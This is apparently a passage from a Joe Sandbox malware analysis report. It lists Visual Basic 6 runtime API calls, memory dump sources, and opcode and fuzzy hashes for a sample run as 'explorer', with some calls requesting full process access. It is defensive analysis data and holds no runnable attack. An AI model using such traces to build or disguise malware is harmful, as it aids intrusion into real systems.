                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,?), ref: 00419822
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,72A26C30,00000000,72A256DE), ref: 00419848
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,72A26C30,00000000,72A256DE), ref: 00419860
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3861917509-0
                                                                                                                                                            • Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
                                                                                                                                                            • Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                            • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 947554498-0
                                                                                                                                                            • Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
                                                                                                                                                            • Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                            • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 269068952-1684325040
                                                                                                                                                            • Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
                                                                                                                                                            • Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$DestructExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1320429144-0
                                                                                                                                                            • Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
                                                                                                                                                            • Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                            • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                            • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                            • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                            • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3705209087-0
                                                                                                                                                            • Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
                                                                                                                                                            • Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 306309671-0
                                                                                                                                                            • Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
                                                                                                                                                            • Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9
                                                                                                                                                            APIs
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(72A26C4A,00000000), ref: 00414DCE
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60(h#@,72A26C4A,00000000), ref: 00414DE2
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba_adj_fdiv_m64
                                                                                                                                                            • String ID: h#@
                                                                                                                                                            • API String ID: 2746309926-1911584123
                                                                                                                                                            • Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
                                                                                                                                                            • Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                            • __vbaGetOwner3.MSVBVM60(00407524,0041B108,?), ref: 00418E78
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3413436688-0
                                                                                                                                                            • Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
                                                                                                                                                            • Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2392155486-0
                                                                                                                                                            • Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
                                                                                                                                                            • Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
                                                                                                                                                            • Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
                                                                                                                                                            • Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 004100CE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                              • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            • Opcode ID: 8fdabc13cc4c6212d4883a9d6da8ea5c5544b0dad22eabd4c65c4d2588561482
                                                                                                                                                            • Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
                                                                                                                                                            • Opcode Fuzzy Hash: 8fdabc13cc4c6212d4883a9d6da8ea5c5544b0dad22eabd4c65c4d2588561482
                                                                                                                                                            • Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
